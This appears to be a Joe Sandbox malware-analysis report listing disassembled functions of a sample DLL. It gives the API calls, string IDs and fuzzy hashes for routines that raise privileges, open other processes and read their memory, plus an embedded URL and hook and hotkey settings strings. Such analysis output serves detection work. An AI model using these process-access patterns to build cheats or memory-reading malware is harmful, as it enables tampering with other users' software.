                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseHandle$CreatePointerReadSize_malloc_memset
                                                                                                                                      • String ID: http://www.m6dlq.com/
                                                                                                                                      • API String ID: 1335355966-2465536842
                                                                                                                                      • Opcode ID: 483ebadd12136a920a72c966fe23b37535fe1a9ca2d5f975a989d81a3a751c3c
                                                                                                                                      • Instruction ID: 1e3c444f99645b8fb71a7a4543818094da34735b15f49745e5af1de9f8395f16
                                                                                                                                      • Opcode Fuzzy Hash: 483ebadd12136a920a72c966fe23b37535fe1a9ca2d5f975a989d81a3a751c3c
                                                                                                                                      • Instruction Fuzzy Hash: 1621A071A543107BF71012386C8EFEF325ABF02736F344129F712E91C1E764A50582D6
                                                                                                                                      Function 69EA1AF0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 82COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA1B9B
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA1BD8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                                                                      • String ID: 2$C$G$M$W$a$e$o
                                                                                                                                      • API String ID: 3726627124-81443989
                                                                                                                                      • Opcode ID: 3c5c9a111469bfde17a0db28097292f076f537f4ef3fe7043df3dd5b15815409
                                                                                                                                      • Instruction ID: 241dc77f11efdd730cb1557f48f48a251fe13dd6b60385bec97c6e588b8e17e0
                                                                                                                                      • Opcode Fuzzy Hash: 3c5c9a111469bfde17a0db28097292f076f537f4ef3fe7043df3dd5b15815409
                                                                                                                                      • Instruction Fuzzy Hash: AD318E7160C3C09ED301CF28848069FBFE2AF9A20CF58599DF1D89B252D265C649C767
                                                                                                                                      Function 69EB00AD Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32), ref: 69EB00D6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 69EB00F3
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 69EB0100
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 69EB010D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 69EB011A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                                      • Opcode ID: 5849ee105555c9606bac52e9b12983d1be7cfd744a25286f976dbed923fd418e
                                                                                                                                      • Instruction ID: c8e073ad750ccce731c4833980fc7f75d9dce11b7d2620124c343aa2ef686624
                                                                                                                                      • Opcode Fuzzy Hash: 5849ee105555c9606bac52e9b12983d1be7cfd744a25286f976dbed923fd418e
                                                                                                                                      • Instruction Fuzzy Hash: 3D114F71D04280DBCF329F66BB8480E7FB4B74B319721887FF104A7219DA345545DB51
                                                                                                                                      Function 69EA2440 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 58COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • _memset.LIBCMT ref: 69EA248B
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA24B9
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA24E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                                                                      • String ID: I$N$P$U$e$w$y
                                                                                                                                      • API String ID: 3693474235-4183856720
                                                                                                                                      • Opcode ID: df29aeead594cad8ff6c0b8bd7d9947a83db626fb2b52cdde1c732832c1e17ac
                                                                                                                                      • Instruction ID: 5073a426f3e9b675646eb87089eeb1154384c184d97d2fff590181f997c34a99
                                                                                                                                      • Opcode Fuzzy Hash: df29aeead594cad8ff6c0b8bd7d9947a83db626fb2b52cdde1c732832c1e17ac
                                                                                                                                      • Instruction Fuzzy Hash: 2511E171A0C3809AE321CA25CC05BAF7BD4AFD6728F14485DF598AA390C3788609C7A7
                                                                                                                                      Function 69EB41C4 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,69EB42DE,?,?), ref: 69EB41D2
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 69EB41F3
                                                                                                                                      • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 69EB4205
                                                                                                                                      • GetProcAddress.KERNEL32(ActivateActCtx), ref: 69EB4217
                                                                                                                                      • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 69EB4229
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                                                                                                      • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                      • API String ID: 417325364-2424895508
                                                                                                                                      • Opcode ID: 11439ebbac469a0bf467b35693c50a3ceeb01b424a60c4c33d92b80a39eba1c3
                                                                                                                                      • Instruction ID: 3b641b435384472f9f61d1da29f05093c876201bff43ba51407db704a8b29ad5
                                                                                                                                      • Opcode Fuzzy Hash: 11439ebbac469a0bf467b35693c50a3ceeb01b424a60c4c33d92b80a39eba1c3
                                                                                                                                      • Instruction Fuzzy Hash: 77F09876C48294AECF039F76BA0890EBFA4BB0B224751881BF400D2254F7798505EF50
                                                                                                                                      Function 69EB4DC3 Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EEFFE8,?,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4DD6
                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4E2C
                                                                                                                                      • GlobalHandle.KERNEL32(03E66720), ref: 69EB4E35
                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4E3F
                                                                                                                                      • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 69EB4E58
                                                                                                                                      • GlobalHandle.KERNEL32(03E66720), ref: 69EB4E6A
                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4E71
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4E7A
                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,00000000,69EEFFCC,69EEFFCC,?,69EB5219,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4E86
                                                                                                                                      • _memset.LIBCMT ref: 69EB4EA0
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,69E8A83E,?,?,69E8A96D), ref: 69EB4ECE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 496899490-0
                                                                                                                                      • Opcode ID: 90f2c21a51ad1eaa8ec16422de0a6ddffec37eabf7f913f560f375c4b9ad786b
                                                                                                                                      • Instruction ID: 96c89739d5910868705fe24561a42adc338b6b0458c19dcad693504ce1ee520d
                                                                                                                                      • Opcode Fuzzy Hash: 90f2c21a51ad1eaa8ec16422de0a6ddffec37eabf7f913f560f375c4b9ad786b
                                                                                                                                      • Instruction Fuzzy Hash: 3D31F071A00705AFDB22CF75DA89A4AB7F9FF45314B10882EE452DB200EB31FA448B50
                                                                                                                                      Function 69E90970 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 346COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __localtime64_s$_memset
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 4132100364-3110715001
                                                                                                                                      • Opcode ID: bc1ba050797b5a9f0b89901a6044ce5a023b20281e7329cc7401a28d2f12d9b1
                                                                                                                                      • Instruction ID: cc7c6aa2c1d78274815603a4c15811cd4a617afd583b9b3444c0501cbed0a1b6
                                                                                                                                      • Opcode Fuzzy Hash: bc1ba050797b5a9f0b89901a6044ce5a023b20281e7329cc7401a28d2f12d9b1
                                                                                                                                      • Instruction Fuzzy Hash: 79D16F751187419FD314CF28C880A5BB7E5FFC9329F248A5DE9A987391EB30E905CB92
                                                                                                                                      Function 69E81910 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 136COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d, xrefs: 69E81A82
                                                                                                                                      • C:\pl.txt, xrefs: 69E81A96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString_strncpy$__wfopen_s_memset_sprintf
                                                                                                                                      • String ID: C:\pl.txt$SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d
                                                                                                                                      • API String ID: 477743007-1446027646
                                                                                                                                      • Opcode ID: 2c7977b95918917ffc7b700638b9de16180f1ff53539ef9141163a700b30d4a7
                                                                                                                                      • Instruction ID: c2829b209ac7e23f0bda9bc904647cdabba425f753ef155fbbee46354cd74e76
                                                                                                                                      • Opcode Fuzzy Hash: 2c7977b95918917ffc7b700638b9de16180f1ff53539ef9141163a700b30d4a7
                                                                                                                                      • Instruction Fuzzy Hash: 935183B1D043819FC751CF68E941BAABBE8FBCA344F14996EE498C7305E7319504CB92
                                                                                                                                      Function 69EA0EE0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 129COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EA0DA0: ReadProcessMemory.KERNEL32 ref: 69EA0DF5
                                                                                                                                        • Part of subcall function 69EA0DA0: CloseHandle.KERNEL32(00000000), ref: 69EA0E23
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00577FED,?,00000006,?,?,?,?,?,?,?,?,69E83F05), ref: 69EA0F48
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0060B93A,?,00000004,?,?,?,?,?,?,69E83F05), ref: 69EA0F88
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0060EAAC,?,00000004,?), ref: 69EA0FA7
